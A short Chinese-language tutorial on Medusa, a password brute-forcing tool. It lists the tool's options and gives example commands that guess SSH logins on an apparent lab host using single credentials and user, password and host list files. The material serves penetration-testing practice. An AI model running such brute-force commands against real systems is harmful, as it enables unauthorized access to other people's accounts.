一、简介
medusa(美杜莎)是一个速度快,支持大规模并行,模块化,爆破登陆,可以同时对多个主机,用户或是密码执行强力测试,medusa和hydra一样,同样属于在线破解工具,不同的是,medusa的稳定性相较于hydra要好很多但是支持的模块相对于hydra少一些。
二、语法参数
medusha [-h host|-H file] [-u username | -U file] [-p password | -P file] [-C file] -M modudle [OPT]
-h 目标主机名称或是IP地址
-H 包含目标主机名称或是IP地址文件
-u 测试用户名
-U 包含测试用户名文件
-p 测试用户名密码
-P 包含测试用户名密码文件
-C 组合条件文件
-O 日志信息文件
-e[n/s/ns] n代表空密码,s代表为密码于用户名相同
-M 模块执行mingc
-m 传递参数到模块
-d 显示所有模块名称
-n 使用非默认TCP端口
-s 启用ssl
-r 重试时间,默认3秒
-t 设定线程数量
三、基本操作
1、指定用户名于密码于服务进行破解
medusa -M ssh -u root -p owaspbwa -h 192.168.72.142
2、指定文件进行破解
创建密码文件,并进行指定
medusa -M ssh -u root -P passlist.txt -h 192.168.72.142
3、指定用户列表文件
medusa -M ssh -U userlist.txt -P passlist.txt -h 192.168.72.142
4、同时我们也可以将见用户改为文件,同时我们也将线程数调为5,
medusa -M ssh -U userlist.txt -P passlist.txt -H server.txt -t 5